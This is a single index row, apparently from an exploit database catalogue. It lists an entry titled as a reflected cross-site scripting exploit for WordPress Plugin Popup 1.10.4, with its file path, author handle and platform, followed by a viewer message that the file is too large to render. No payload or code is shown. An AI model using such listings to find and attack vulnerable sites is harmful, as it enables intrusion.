50346,exploits/php/webapps/50346.txt,"WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,

Can't render this file because it is too large.